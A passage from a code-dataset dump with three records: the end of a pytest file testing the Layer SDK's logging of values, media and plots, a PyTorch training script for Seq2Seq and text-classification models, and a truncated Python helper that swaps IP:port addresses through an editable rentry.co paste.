layer.get_dataset(dataset_name)\n\n # add a log to the older version of the dataset\n ds_v1.log({\"foo\": 123})\n\n assert ds_v1.get_metadata(\"zoo\").value() == 567\n assert ds_v1.get_metadata(\"foo\").value() == 123\n\n assert ds_v2.get_metadata(\"str_tag\").value() == \"bar\"\n\n with pytest.raises(LayerClientResourceNotFoundException):\n assert ds_v2.get_metadata(\"zoo\")\n\n with pytest.raises(LayerClientResourceNotFoundException):\n assert ds_v2.get_metadata(\"foo\")\n\n with pytest.raises(LayerClientResourceNotFoundException):\n assert ds_v1.get_metadata(\"str_tag\")\n\n\ndef test_scalar_values_logged(\n initialized_project: Project, asserter: E2ETestAsserter, client: LayerClient\n):\n # given\n dataset_name = \"scalar_ds\"\n\n str_tag = \"str_tag\"\n int_tag = \"int_tag\"\n bool_tag = \"bool_tag\"\n float_tag = \"float_tag\"\n\n @dataset(dataset_name)\n def scalar():\n data = [[1, \"product1\", 15], [2, \"product2\", 20], [3, \"product3\", 10]]\n dataframe = pd.DataFrame(data, columns=[\"Id\", \"Product\", \"Price\"])\n layer.log(\n {\n str_tag: \"bar\",\n int_tag: 123,\n bool_tag: True,\n float_tag: 1.11,\n }\n )\n return dataframe\n\n # when\n scalar()\n\n # then\n first_ds = client.data_catalog.get_dataset_by_name(\n initialized_project.id, dataset_name\n )\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=str_tag, dataset_build_id=first_ds.id\n )\n assert logged_data.value == \"bar\"\n assert logged_data.logged_data_type == LoggedDataType.TEXT\n assert logged_data.tag == str_tag\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=int_tag, dataset_build_id=first_ds.id\n )\n assert logged_data.value == \"123\"\n assert logged_data.logged_data_type == LoggedDataType.NUMBER\n assert logged_data.tag == int_tag\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=bool_tag, dataset_build_id=first_ds.id\n )\n assert logged_data.value == \"True\"\n assert logged_data.logged_data_type == LoggedDataType.BOOLEAN\n assert logged_data.tag == bool_tag\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=float_tag, dataset_build_id=first_ds.id\n )\n assert logged_data.value == \"1.11\"\n assert logged_data.logged_data_type == LoggedDataType.NUMBER\n assert logged_data.tag == float_tag\n\n\ndef test_list_values_logged(\n 
initialized_project: Project, asserter: E2ETestAsserter, client: LayerClient\n):\n # given\n dataset_name = \"list_ds\"\n\n list_tag = \"list_tag\"\n numpy_tag = \"numpy_tag\"\n\n @dataset(dataset_name)\n def lists():\n data = [[1, \"product1\", 15], [2, \"product2\", 20], [3, \"product3\", 10]]\n dataframe = pd.DataFrame(data, columns=[\"Id\", \"Product\", \"Price\"])\n layer.log(\n {\n list_tag: [\"a\", \"b\", \"c\"],\n numpy_tag: np.array([1, 2, 3]),\n }\n )\n return dataframe\n\n # when\n lists()\n\n # then\n first_ds = client.data_catalog.get_dataset_by_name(\n initialized_project.id, dataset_name\n )\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=list_tag, dataset_build_id=first_ds.id\n )\n assert logged_data.value == str([\"a\", \"b\", \"c\"])\n assert logged_data.logged_data_type == LoggedDataType.TEXT\n assert logged_data.tag == list_tag\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=numpy_tag, dataset_build_id=first_ds.id\n )\n assert logged_data.value == str([1, 2, 3])\n assert logged_data.logged_data_type == LoggedDataType.TEXT\n assert logged_data.tag == numpy_tag\n\n\ndef test_pandas_dataframe_logged(initialized_project: Project, client: LayerClient):\n # given\n ds_tag = \"dataframe_tag\"\n ds_name = \"pandas_dataframe_log\"\n\n @dataset(ds_name)\n def dataset_func():\n d = {\"col1\": [1, 2], \"col2\": [3, 4]}\n df = pd.DataFrame(data=d)\n layer.log({ds_tag: df})\n return df\n\n # then\n dataset_func()\n\n ds = client.data_catalog.get_dataset_by_name(initialized_project.id, ds_name)\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=ds_tag, dataset_build_id=ds.id\n )\n\n assert logged_data.logged_data_type == LoggedDataType.TABLE\n\n\ndef test_markdown_logged(initialized_project: Project, client: LayerClient):\n # given\n ds_tag = \"dataframe_tag\"\n ds_name = \"markdown_dataframe_log\"\n\n markdown = \"\"\"\n # Markdown header\n Some code with [link](http://my link)\n \"\"\"\n\n @dataset(ds_name)\n def dataset_func():\n layer.log({ds_tag: layer.Markdown(markdown)})\n return pd.DataFrame(data={\"col1\": [1, 2], \"col2\": [3, 4]})\n\n # then\n dataset_func()\n\n ds = client.data_catalog.get_dataset_by_name(initialized_project.id, ds_name)\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=ds_tag, dataset_build_id=ds.id\n )\n\n assert logged_data.logged_data_type == LoggedDataType.MARKDOWN\n assert logged_data.value == markdown\n\n\ndef test_image_and_video_logged(initialized_project: Project, client: LayerClient):\n # given\n ds_name = \"multimedia\"\n model_name = \"model_with_stepped_log\"\n pil_image_tag = \"pil_image_tag\"\n image_path_tag = \"image_path_tag\"\n video_path_tag = \"video_path_tag\"\n stepped_pil_image_tab = \"stepped_pil_image_tag\"\n pytorch_tensor_video_tag = \"pytorch_tensor_video_tag\"\n\n @dataset(ds_name)\n def multimedia():\n import os\n from pathlib import Path\n\n from PIL import Image\n\n image = Image.open(f\"{os.getcwd()}/test/e2e/assets/log_assets/layer_logo.jpeg\")\n layer.log({pil_image_tag: image})\n\n image_path = Path(f\"{os.getcwd()}/test/e2e/assets/log_assets/layer_logo.jpeg\")\n layer.log({image_path_tag: image_path})\n\n video_path = Path(f\"{os.getcwd()}/test/e2e/assets/log_assets/layer_video.mp4\")\n layer.log({video_path_tag: video_path})\n\n import torch\n\n tensor_video = torch.rand(10, 3, 100, 200)\n layer.log({pytorch_tensor_video_tag: Video(tensor_video)})\n\n return pd.DataFrame(data={\"col1\": [1, 2], \"col2\": [3, 
4]})\n\n multimedia()\n\n ds = client.data_catalog.get_dataset_by_name(initialized_project.id, ds_name)\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=pil_image_tag, dataset_build_id=ds.id\n )\n assert logged_data.value.startswith(\"https://logged-data--layer\")\n assert logged_data.value.endswith(pil_image_tag)\n assert logged_data.logged_data_type == LoggedDataType.IMAGE\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=image_path_tag, dataset_build_id=ds.id\n )\n assert logged_data.value.startswith(\"https://logged-data--layer\")\n assert logged_data.value.endswith(image_path_tag)\n assert logged_data.logged_data_type == LoggedDataType.IMAGE\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=video_path_tag, dataset_build_id=ds.id\n )\n assert logged_data.value.startswith(\"https://logged-data--layer\")\n assert logged_data.value.endswith(video_path_tag)\n assert logged_data.logged_data_type == LoggedDataType.VIDEO\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=pytorch_tensor_video_tag, dataset_build_id=ds.id\n )\n assert logged_data.value.startswith(\"https://logged-data--layer\")\n assert logged_data.value.endswith(pytorch_tensor_video_tag)\n assert logged_data.logged_data_type == LoggedDataType.VIDEO\n\n @pip_requirements(packages=[\"scikit-learn==0.23.2\"])\n @model(model_name)\n def train_model():\n import os\n\n from PIL import Image\n from sklearn import datasets\n\n iris = datasets.load_iris()\n clf = SVC()\n result = clf.fit(iris.data, iris.target)\n\n image = Image.open(f\"{os.getcwd()}/test/e2e/assets/log_assets/layer_logo.jpeg\")\n for step in range(4, 6):\n layer.log({stepped_pil_image_tab: image}, step=step)\n\n print(\"model1 computed fully\")\n return result\n\n train_model()\n\n mdl = layer.get_model(model_name)\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=stepped_pil_image_tab, train_id=UUID(mdl.storage_config.train_id.value)\n )\n assert logged_data.logged_data_type == LoggedDataType.IMAGE\n assert len(logged_data.values_with_coordinates) == 2\n assert logged_data.values_with_coordinates[4].startswith(\n \"https://logged-data--layer\"\n )\n assert logged_data.values_with_coordinates[4].endswith(\n f\"{stepped_pil_image_tab}/epoch/4\"\n )\n assert logged_data.values_with_coordinates[5].startswith(\n \"https://logged-data--layer\"\n )\n assert logged_data.values_with_coordinates[5].endswith(\n f\"{stepped_pil_image_tab}/epoch/5\"\n )\n\n\ndef test_file_and_directory_logged(initialized_project: Project, client: LayerClient):\n # given\n ds_name = \"file_and_directory\"\n file_tag = \"file_tag\"\n directory_tag = \"directory_tag\"\n\n @dataset(ds_name)\n def file_and_directory():\n import os\n from pathlib import Path\n\n layer.log(\n {file_tag: Path(f\"{os.getcwd()}/test/e2e/assets/log_assets/somefile.txt\")}\n )\n layer.log(\n {directory_tag: Path(f\"{os.getcwd()}/test/e2e/assets/log_assets/somedir\")}\n )\n\n return pd.DataFrame(data={\"col1\": [1, 2], \"col2\": [3, 4]})\n\n file_and_directory()\n\n ds = client.data_catalog.get_dataset_by_name(initialized_project.id, ds_name)\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=file_tag, dataset_build_id=ds.id\n )\n assert logged_data.value.startswith(\"https://logged-data--layer\")\n assert logged_data.value.endswith(file_tag)\n assert logged_data.logged_data_type == LoggedDataType.FILE\n\n logged_data = client.logged_data_service_client.get_logged_data(\n 
tag=directory_tag, dataset_build_id=ds.id\n )\n assert logged_data.value.startswith(\"https://logged-data--layer\")\n assert logged_data.value.endswith(directory_tag)\n assert logged_data.logged_data_type == LoggedDataType.DIRECTORY\n\n\ndef test_matplotlib_objects_logged(initialized_project: Project, client: LayerClient):\n # given\n figure_tag = \"matplotlib_figure_tag\"\n plot_tag = \"matplotlib_pyplot_tag\"\n\n ds_name = \"ds_with_plots\"\n\n @dataset(ds_name)\n def dataset_func():\n import matplotlib.pyplot as plt\n import seaborn\n\n data = pd.DataFrame({\"col\": [1, 2, 42]})\n plot = seaborn.histplot(data=data, x=\"col\", color=\"green\")\n layer.log({plot_tag: plot})\n\n figure = plt.figure()\n figure.add_subplot(111)\n\n layer.log({figure_tag: figure})\n return pd.DataFrame(data={\"col1\": [1, 2], \"col2\": [3, 4]})\n\n # then\n dataset_func()\n\n ds = client.data_catalog.get_dataset_by_name(initialized_project.id, ds_name)\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=figure_tag, dataset_build_id=ds.id\n )\n\n assert logged_data.value.startswith(\"https://logged-data--layer\")\n assert logged_data.value.endswith(figure_tag)\n assert logged_data.logged_data_type == LoggedDataType.IMAGE\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=plot_tag, dataset_build_id=ds.id\n )\n\n assert logged_data.value.startswith(\"https://logged-data--layer\")\n assert logged_data.value.endswith(plot_tag)\n assert logged_data.logged_data_type == LoggedDataType.IMAGE\n\n\ndef test_metrics_logged(initialized_project: Project, client: LayerClient):\n # given\n metric_tag_1 = \"metric_tag_1\"\n metric_tag_2 = \"metric_tag_2\"\n\n ds_name = \"metrics_ds\"\n\n @dataset(ds_name)\n def metrics():\n for step in range(1, 5):\n layer.log(\n {metric_tag_1: f\"value {step}\", metric_tag_2: f\"value {step}\"}, step\n )\n return pd.DataFrame(data={\"col1\": [1, 2], \"col2\": [3, 4]})\n\n # then\n metrics()\n\n ds = client.data_catalog.get_dataset_by_name(initialized_project.id, ds_name)\n\n logged_data = client.logged_data_service_client.get_logged_data(\n tag=metric_tag_1, dataset_build_id=ds.id\n )\n\n assert logged_data.logged_data_type == LoggedDataType.TEXT\n # value from the last step\n assert logged_data.value == \"value 4\"\n", "repo_name": "layerai-archive/sdk", "sub_path": "test/e2e/test_log_types.py", "file_name": "test_log_types.py", "file_ext": "py", "file_size_in_byte": 14938, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 89, "dataset": "github-code", "pt": "41", "api": [{"api_name": "layer.contracts.projects.Project", "line_number": 18, "usage_type": "name"}, {"api_name": "test.e2e.assertion_utils.E2ETestAsserter", "line_number": 18, "usage_type": "name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 18, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 28, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 29, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 25, "usage_type": "call"}, {"api_name": "layer.run", "line_number": 37, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.TEXT", "line_number": 50, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 50, "usage_type": "name"}, {"api_name": "layer.contracts.projects.Project", "line_number": 55, "usage_type": "name"}, {"api_name": "test.e2e.assertion_utils.E2ETestAsserter", "line_number": 55, "usage_type": 
"name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 55, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 63, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 64, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 60, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 75, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 76, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 72, "usage_type": "call"}, {"api_name": "layer.get_dataset", "line_number": 85, "usage_type": "call"}, {"api_name": "layer.get_dataset", "line_number": 88, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 98, "usage_type": "call"}, {"api_name": "layer.exceptions.exceptions.LayerClientResourceNotFoundException", "line_number": 98, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 101, "usage_type": "call"}, {"api_name": "layer.exceptions.exceptions.LayerClientResourceNotFoundException", "line_number": 101, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 104, "usage_type": "call"}, {"api_name": "layer.exceptions.exceptions.LayerClientResourceNotFoundException", "line_number": 104, "usage_type": "argument"}, {"api_name": "layer.contracts.projects.Project", "line_number": 109, "usage_type": "name"}, {"api_name": "test.e2e.assertion_utils.E2ETestAsserter", "line_number": 109, "usage_type": "name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 109, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 122, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 123, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 119, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.TEXT", "line_number": 145, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 145, "usage_type": "name"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.NUMBER", "line_number": 152, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 152, "usage_type": "name"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.BOOLEAN", "line_number": 159, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 159, "usage_type": "name"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.NUMBER", "line_number": 166, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 166, "usage_type": "name"}, {"api_name": "layer.contracts.projects.Project", "line_number": 171, "usage_type": "name"}, {"api_name": "test.e2e.assertion_utils.E2ETestAsserter", "line_number": 171, "usage_type": "name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 171, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 182, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 186, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 179, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.TEXT", "line_number": 203, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 203, "usage_type": "name"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.TEXT", "line_number": 
210, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 210, "usage_type": "name"}, {"api_name": "layer.contracts.projects.Project", "line_number": 214, "usage_type": "name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 214, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 222, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 223, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 219, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.TABLE", "line_number": 235, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 235, "usage_type": "name"}, {"api_name": "layer.contracts.projects.Project", "line_number": 238, "usage_type": "name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 238, "usage_type": "name"}, {"api_name": "layer.log", "line_number": 250, "usage_type": "call"}, {"api_name": "layer.Markdown", "line_number": 250, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 251, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 248, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.MARKDOWN", "line_number": 262, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 262, "usage_type": "name"}, {"api_name": "layer.contracts.projects.Project", "line_number": 266, "usage_type": "name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 266, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 283, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 283, "usage_type": "name"}, {"api_name": "os.getcwd", "line_number": 283, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 284, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 286, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 286, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 287, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 289, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 289, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 290, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 294, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 295, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.Video", "line_number": 295, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 297, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 276, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.IMAGE", "line_number": 308, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 308, "usage_type": "name"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.IMAGE", "line_number": 315, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 315, "usage_type": "name"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.VIDEO", "line_number": 322, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 322, "usage_type": "name"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.VIDEO", "line_number": 329, "usage_type": "attribute"}, {"api_name": 
"layer.contracts.logged_data.LoggedDataType", "line_number": 329, "usage_type": "name"}, {"api_name": "sklearn.datasets.load_iris", "line_number": 339, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 339, "usage_type": "name"}, {"api_name": "sklearn.svm.SVC", "line_number": 340, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 343, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 343, "usage_type": "name"}, {"api_name": "os.getcwd", "line_number": 343, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 345, "usage_type": "call"}, {"api_name": "layer.decorators.pip_requirements", "line_number": 331, "usage_type": "call"}, {"api_name": "layer.decorators.model", "line_number": 332, "usage_type": "call"}, {"api_name": "layer.get_model", "line_number": 352, "usage_type": "call"}, {"api_name": "uuid.UUID", "line_number": 354, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.IMAGE", "line_number": 356, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 356, "usage_type": "name"}, {"api_name": "layer.contracts.projects.Project", "line_number": 372, "usage_type": "name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 372, "usage_type": "name"}, {"api_name": "layer.log", "line_number": 383, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 384, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 384, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 386, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 387, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 387, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 390, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 378, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.FILE", "line_number": 401, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 401, "usage_type": "name"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.DIRECTORY", "line_number": 408, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 408, "usage_type": "name"}, {"api_name": "layer.contracts.projects.Project", "line_number": 411, "usage_type": "name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 411, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 423, "usage_type": "call"}, {"api_name": "seaborn.histplot", "line_number": 424, "usage_type": "call"}, {"api_name": "layer.log", "line_number": 425, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 427, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 427, "usage_type": "name"}, {"api_name": "layer.log", "line_number": 430, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 431, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 418, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.IMAGE", "line_number": 444, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 444, "usage_type": "name"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.IMAGE", "line_number": 452, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 452, "usage_type": 
"name"}, {"api_name": "layer.contracts.projects.Project", "line_number": 455, "usage_type": "name"}, {"api_name": "layer.clients.layer.LayerClient", "line_number": 455, "usage_type": "name"}, {"api_name": "layer.log", "line_number": 465, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 468, "usage_type": "call"}, {"api_name": "layer.decorators.dataset", "line_number": 462, "usage_type": "call"}, {"api_name": "layer.contracts.logged_data.LoggedDataType.TEXT", "line_number": 479, "usage_type": "attribute"}, {"api_name": "layer.contracts.logged_data.LoggedDataType", "line_number": 479, "usage_type": "name"}]} +{"seq_id": "41718527699", "text": "# -*- coding: utf-8 -*-\nimport argparse\nimport pickle\n\nfrom nlp_learning.torch.text_classification.base_model import Treator\nfrom nlp_learning.torch.text_classification.textCNN import TextCNN\nfrom nlp_learning.torch.text_classification.textRNN import TextRNN, TextRCNN, TextRNNAttention, TextRNNAttentionWithSentence\n\nfrom nlp_learning.torch.translation.base_model import Treator as TransTreator\nfrom nlp_learning.torch.translation.seq2seq import Seq2Seq\n\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--input_size', action='store', default=None, type=str, help='input size of one example')\nparser.add_argument('--label_size', action='store', default=None, type=int, help='label size of one example')\nparser.add_argument('--num_class', action='store', default=3, type=int, help='number of labels')\nparser.add_argument('--train_file', action='store', required=True, type=str, help='path of train data')\nparser.add_argument('--valid_file', action='store', default=\"\", type=str, help='path of validate data')\nparser.add_argument('--ckpt_folder', action='store', default=\"checkpoints\", type=str, help='path of checkpoint folder')\nparser.add_argument('--train_cp', action='store', default=None, type=str, help='checkpoint to load for training, None by default')\nparser.add_argument('--epochs', action='store', default=5, type=int, help='epochs to circulate train data, 5 by default')\nparser.add_argument('--hidden_size', action='store', default=100, type=int, help='LSTM hidden size, 100 by default')\nparser.add_argument('--embed_size', action='store', default=100, type=int, help='embedding size, 100 by default')\nparser.add_argument('--attn_size', action='store', default=100, type=int, help='attention size, 100 by default')\nparser.add_argument('--filter_sizes', action='store', default=\"1,2,3\", type=str, help='sizes of filters, \"1,2,3\" by default')\nparser.add_argument('--num_filter', action='store', default=128, type=int, help='number of filters for each size, 128 by default')\nparser.add_argument('--num_sampled', action='store', default=100, type=int, help='sampled num for softmax, 100 by default')\nparser.add_argument('--learning_rate', action='store', default=0.001, type=float, help='learning rate, 0.001 by default')\nparser.add_argument('--decay_step', action='store', default=1000, type=int, help='number of steps to make once decay rate, 1000 by default')\nparser.add_argument('--decay_rate', action='store', default=0.8, type=float, help='decay rate for learning rate, 0.8 by default')\nparser.add_argument('--batch_size', action='store', default=64, type=int, help='batch size, 64 by default')\nparser.add_argument('--l2_lambda', action='store', default=0.0001, type=float, help='learning rate, 0.0001 by default')\nparser.add_argument('--pos_weight', action='store', default=1.0, type=float, help='weight of positive 
sample in sigmoid cross entropy, 1.0 by default')\nparser.add_argument('--clip_gradient', action='store', default=5.0, type=float, help='clip gradients, 5.0 by default')\nparser.add_argument('--multi_label', action='store', default=False, help='if one sample has multilabels, False by default')\nparser.add_argument('--use_cuda', action='store', default=False, help='if using cuda, False by default')\n\nargs = parser.parse_args()\n\n\ndef run():\n input_size = args.input_size\n if input_size:\n input_size = [int(s) for s in input_size.strip().split(\",\")]\n if len(input_size) == 1:\n input_size = input_size[0]\n label_size = args.label_size\n num_class = args.num_class\n train_file = args.train_file\n valid_file = args.valid_file\n save_path = args.ckpt_folder\n train_cp = args.train_cp\n epochs = args.epochs\n hidden_size = args.hidden_size\n embed_size = args.embed_size\n attn_size = args.attn_size\n filter_sizes = [int(s) for s in args.filter_sizes.strip().split(\",\")]\n num_filter = args.num_filter\n num_sampled = args.num_sampled\n learning_rate = args.learning_rate\n decay_step = args.decay_step\n decay_rate = args.decay_rate\n batch_size = args.batch_size\n l2_ld = args.l2_lambda\n pos_weight = args.pos_weight\n clip_gradient = args.clip_gradient\n multi_label = args.multi_label\n use_cuda = args.use_cuda\n\n # _, _, voca_size = pickle.load(open(train_file, \"rb\"))\n #\n # model = TextCNN(voca_size, input_size, num_class, filter_sizes, num_filter, embed_size, use_cuda)\n # model = TextRNN(voca_size, num_class, hidden_size, embed_size, use_cuda)\n # model = TextRNNAttention(voca_size, num_class, hidden_size, embed_size, attn_size, use_cuda)\n # model = TextRNNAttentionWithSentence(voca_size, num_class, hidden_size, embed_size, attn_size, use_cuda)\n # model = TextRCNN(voca_size, input_size, num_class, hidden_size, embed_size, num_filter, use_cuda)\n\n # clf = Treator(model, multi_label, use_cuda)\n #\n # clf.train(train_file, save_path, valid_file, train_cp, batch_size, learning_rate, epochs, l2_ld, input_size)\n\n _, _, dict_size = pickle.load(open(train_file, \"rb\"))\n\n model = Seq2Seq(dict_size[0], dict_size[1], label_size, embed_size, hidden_size, attn_size, dropout_p=0.5, use_cuda=False)\n\n clf = TransTreator(model, use_cuda)\n\n clf.train(train_file, save_path, valid_file, train_cp, batch_size, learning_rate, epochs, input_size, label_size)\n\n\nif __name__ == \"__main__\":\n run()\n", "repo_name": "RogerLRH/nlp_learning", "sub_path": "torch_train.py", "file_name": "torch_train.py", "file_ext": "py", "file_size_in_byte": 5352, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 83, "usage_type": "call"}, {"api_name": "nlp_learning.torch.translation.seq2seq.Seq2Seq", "line_number": 85, "usage_type": "call"}, {"api_name": "nlp_learning.torch.translation.base_model.Treator", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "23086533129", "text": "from bs4 import BeautifulSoup\nimport requests\n\nimport time\nimport socket\n\n\nRENTRY_URL_PREFIX = 'https://rentry.co/'\n# RENTRY_URL_PREFIX = 'https://rentry.org/' # alternative .org domain\nIPV4_SERVICE_URL = 'https://ipinfo.io/ip'\n\n\nclass Rentry:\n def __init__(self, rentry_id, rentry_code):\n self.retry_url = RENTRY_URL_PREFIX\n self.rentry_id = rentry_id\n self.rentry_code = rentry_code\n self.retry_url_id = self.retry_url + 
rentry_id\n\n self.session = requests.Session()\n self.session.headers['Referer'] = self.retry_url_id\n \n def __enter__(self):\n return self\n\n def __exit__(self, *args):\n self.session.close()\n return False\n\n def _get_token(self):\n response = self.session.get(self.retry_url)\n response.raise_for_status()\n\n soup = BeautifulSoup(response.text, 'html.parser')\n return soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']\n\n def get_raw(self):\n response = self.session.get(self.retry_url_id + '/raw')\n response.raise_for_status()\n return response.text\n\n def edit_text(self, text):\n ''' maximum `text` length of 200,000 characters '''\n data = {\n 'csrfmiddlewaretoken': self._get_token(),\n 'text': text,\n 'edit_code': self.rentry_code,\n }\n\n response = self.session.post(self.retry_url_id + '/edit', data=data, allow_redirects=False)\n assert response.status_code == 302 and response.headers['Location'] == '/' + self.rentry_id, 'wrong edit_code?'\n\n\nclass PortExchangeHelper(Rentry):\n @staticmethod\n def _extract_addrs(text):\n addrs = []\n for addr in text.splitlines():\n ip, port = addr.split(':')\n addrs.append((ip, int(port)))\n return addrs\n\n @staticmethod\n def _addrs_to_text(addrs):\n text = ''\n for ip, port in addrs:\n text += f'{ip}:{port}\\n'\n return text\n\n def get_public_ipv4(self):\n response = self.session.get(IPV4_SERVICE_URL)\n response.raise_for_status()\n return response.text\n \n def get(self):\n text = self.get_raw()\n return self._extract_addrs(text)\n\n def put(self, addrs):\n self.edit_text(self._addrs_to_text(addrs))\n\n def wait_empty(self, t=1):\n time.sleep(t)\n while self.get():\n time.sleep(t)\n \n def 